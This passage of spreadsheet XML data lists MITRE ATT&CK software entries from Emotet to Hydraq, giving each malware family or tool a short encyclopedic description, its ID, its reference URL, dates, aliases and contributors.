    <t>[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0367</t>
  </si>
  <si>
    <t>25 March 2019</t>
  </si>
  <si>
    <t>Geodo</t>
  </si>
  <si>
    <t>Omkar Gudhate</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0363</t>
  </si>
  <si>
    <t>11 March 2019</t>
  </si>
  <si>
    <t>09 April 2021</t>
  </si>
  <si>
    <t>EmPyre, PowerShell Empire</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0091</t>
  </si>
  <si>
    <t>26 October 2020</t>
  </si>
  <si>
    <t>TadjMakhal, Tavdig, Wipbot, WorldCupSec</t>
  </si>
  <si>
    <t>Martin Smolár, ESET</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0396</t>
  </si>
  <si>
    <t>28 June 2019</t>
  </si>
  <si>
    <t>02 April 2021</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0152</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0401</t>
  </si>
  <si>
    <t>26 August 2019</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0343</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0361</t>
  </si>
  <si>
    <t>19 February 2019</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>S0569</t>
  </si>
  <si>
    <t>Explosive</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0569</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0181</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0267</t>
  </si>
  <si>
    <t>GreyEnergy mini</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036)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</si>
  <si>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https://attack.mitre.org/software/S0036</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0173</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0095</t>
  </si>
  <si>
    <t>ftp.exe</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0076</t>
  </si>
  <si>
    <t>27 March 2020</t>
  </si>
  <si>
    <t>S0512</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0512</t>
  </si>
  <si>
    <t>24 September 2020</t>
  </si>
  <si>
    <t>09 October 2020</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0171</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0120</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0182</t>
  </si>
  <si>
    <t>Android, Windows</t>
  </si>
  <si>
    <t>FinSpy</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0355</t>
  </si>
  <si>
    <t>31 January 2019</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0143</t>
  </si>
  <si>
    <t>Flamer, sKyWIper</t>
  </si>
  <si>
    <t>S0381</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0381</t>
  </si>
  <si>
    <t>28 May 2019</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0383</t>
  </si>
  <si>
    <t>29 May 2019</t>
  </si>
  <si>
    <t>07 June 2019</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0193</t>
  </si>
  <si>
    <t>S0503</t>
  </si>
  <si>
    <t>FrameworkPOS</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0503</t>
  </si>
  <si>
    <t>08 September 2020</t>
  </si>
  <si>
    <t>19 October 2020</t>
  </si>
  <si>
    <t>Trinity</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>FruitFly</t>
  </si>
  <si>
    <t>FruitFly is designed to spy on mac users  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0277</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0410</t>
  </si>
  <si>
    <t>12 September 2019</t>
  </si>
  <si>
    <t>06 November 2020</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0026</t>
  </si>
  <si>
    <t>Trojan.GTALK</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0417</t>
  </si>
  <si>
    <t>23 June 2020</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0168</t>
  </si>
  <si>
    <t>WhiteBear</t>
  </si>
  <si>
    <t>Bartosz Jerzman</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0049</t>
  </si>
  <si>
    <t>S0460</t>
  </si>
  <si>
    <t>Get2</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0460</t>
  </si>
  <si>
    <t>16 June 2020</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>Gold Dragon</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0249</t>
  </si>
  <si>
    <t>S0597</t>
  </si>
  <si>
    <t>GoldFinder</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform  threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0597</t>
  </si>
  <si>
    <t>26 March 2021</t>
  </si>
  <si>
    <t>S0588</t>
  </si>
  <si>
    <t>GoldMax</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0588</t>
  </si>
  <si>
    <t>SUNSHUTTLE</t>
  </si>
  <si>
    <t>S0493</t>
  </si>
  <si>
    <t>GoldenSpy</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0493</t>
  </si>
  <si>
    <t>23 July 2020</t>
  </si>
  <si>
    <t>19 August 2020</t>
  </si>
  <si>
    <t>S0477</t>
  </si>
  <si>
    <t>Goopy</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0477</t>
  </si>
  <si>
    <t>19 June 2020</t>
  </si>
  <si>
    <t>S0531</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0531</t>
  </si>
  <si>
    <t>10 November 2020</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0237</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0342</t>
  </si>
  <si>
    <t>S0561</t>
  </si>
  <si>
    <t>GuLoader</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0561</t>
  </si>
  <si>
    <t>11 January 2021</t>
  </si>
  <si>
    <t>20 April 2021</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0132</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>HALFBAKED</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0151</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0037</t>
  </si>
  <si>
    <t>HammerDuke, NetDuke</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0214</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0246</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0391</t>
  </si>
  <si>
    <t>20 June 2019</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0061</t>
  </si>
  <si>
    <t>25 April 2019</t>
  </si>
  <si>
    <t>Custom HDoor</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0135</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0232</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0376</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0040</t>
  </si>
  <si>
    <t>HUC Packet Transmit Tool</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0070</t>
  </si>
  <si>
    <t>HttpDump, Token Control</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0047</t>
  </si>
  <si>
    <t>S0499</t>
  </si>
  <si>
    <t>Hancitor</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0499</t>
  </si>
  <si>
    <t>12 August 2020</t>
  </si>
  <si>
    <t>16 October 2020</t>
  </si>
  <si>
    <t>Chanitor</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0224</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0170</t>
  </si>
  <si>
    <t>Robert Falcone</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0087</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0394</t>
  </si>
  <si>
    <t>24 June 2019</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0009</t>
  </si>
  <si>
    <t>S0601</t>
  </si>
  <si>
    <t>Hildegard</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0601</t>
  </si>
  <si>
    <t>07 April 2021</t>
  </si>
  <si>
    <t>12 April 2021</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux</t>
  </si>
  <si>
    <t>S0431</t>
  </si>
  <si>
    <t>HotCroissant</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0431</t>
  </si>
  <si>
    <t>01 May 2020</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0203</t>
  </si>
  <si>
    <t>06 January 2021</t>
  </si>
  <si>
